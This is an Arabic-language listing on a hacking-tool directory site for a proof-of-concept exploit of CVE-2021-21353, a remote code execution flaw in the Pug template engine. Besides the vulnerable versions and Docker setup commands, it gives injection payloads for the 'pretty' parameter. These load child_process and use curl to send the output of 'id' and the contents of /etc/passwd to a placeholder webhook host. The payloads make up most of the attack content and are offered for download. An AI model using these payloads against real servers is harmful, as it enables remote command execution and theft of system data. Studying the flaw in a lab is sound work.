Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jinsu9758/pug-rce-cve-2021-21353-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubjinsu9758/pug-rce-cve-2021-21353-poc

PUG-RCE-CVE-2021-21353-POC

استغلال إثبات المفهوم لـ CVE-2021-21353، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد في محرك قوالب Pug الإصدارات <=3.0.0. يوضح حقن الحمولة عبر معلمة 'pretty' لتنفيذ أوامر عشوائية.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PUG-RCE (CVE-2021-21353) POC

معلومات الثغرة

رقم CVE : cve-2021-21353
درجة CVSS : 8.1

< الإصدارات المعرضة للخطر >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2


إعداد البيئة

git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up

※ يمكن الوصول عبر المنفذ 3000


Payload

اختبار الحمولة
?pretty=');console.log('executed');//

الحمولة النهائية
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('

?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('

تنزيل الأداة